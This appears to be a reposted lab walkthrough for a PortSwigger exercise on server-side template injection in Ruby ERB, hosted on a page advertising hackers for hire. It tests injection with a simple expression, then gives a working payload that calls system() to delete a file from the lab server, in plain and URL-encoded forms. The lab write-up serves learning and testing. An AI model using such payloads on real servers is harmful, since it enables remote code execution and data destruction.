help@cyb4rgeek.xyz

+1 (512) 588 6950

Cybergeek Hackers Hiring Hub is the best place people can hire professional hackers with the highest level of expertise in cybersecurity and hacking.

Call Us

+1 (512) 588 6950

Write Us

help@cyb4rgeek.xyz

Working Hours

24 Hours Service

Basic SSTI — Server-Side Template Injection | 2023

Home/Basic SSTI — Server-Side Tem...
Basic SSTI — Server-Side Template Injection | 2023
bug-bountybug-bounty-tipsCTFhackingportswigger
Basic SSTI — Server-Side Template Injection | 2023 bez0x January 24, 2023

What is SSTI?

  • Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server-side
  • This vulnerability occurs when invalid user input is embedded into the template engine which can generally lead to remote code execution (RCE).
  • Template engines are designed to combine templates with a data model to produce result documents that help populate dynamic data into web pages.
  • Template engines can be used to display information about users, products
  • Popular template engines are,
  1. PHP — Smarty, Twigs
  2. Java — Velocity, Freemaker
  3. Python — JINJA, Mako, Tornado
  4. JavaScript — Jade, Rage
  5. Ruby — Liquid

What is ERB?

  • ERB is a templating language based on Ruby.
  • Puppet can evaluate ERB templates with the template and inline_template functions.

Lab Description:

This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.

To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory.

Analysis:

  1. On Clicking the First Product, it is Displaying a Message “Unfortunately this product is out of stock

2. Capture the Request on burp “if needed

3. Let’s try to Insert the ERB code. The Syntax is below,

<%= someExpression %>

Code to Check:

<%= 5*5 %>

4. Look at the request, the URL Parameter is encoded, so we have to Encode the ERB code if we are sending in burp

Encoded Final Url (If Sending this in Burp):

https://<Your-Lab-ID>.web-security-academy.net/?message=<%25%3d+5*5+%25>

5. Or you can Directly Insert the code into the message parameter on the browser to check

6. It is Working, So let’s Inject a payload to deletemorale.txt

7. From the Ruby documentation, discover the system() method, which can be used to execute arbitrary operating system commands.

8. Construct a payload to delete Carlos’s file as follows:

<%= system("rm /home/carlos/morale.txt") %>

9. Inject the payload into the message parameter as below

https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
Decrypting HTTPS Traffic as A Hacker
Clipboard Hijacking 😈. What it is, how to do it, and how to prevent it
bez0x

bez0x

Leave a Reply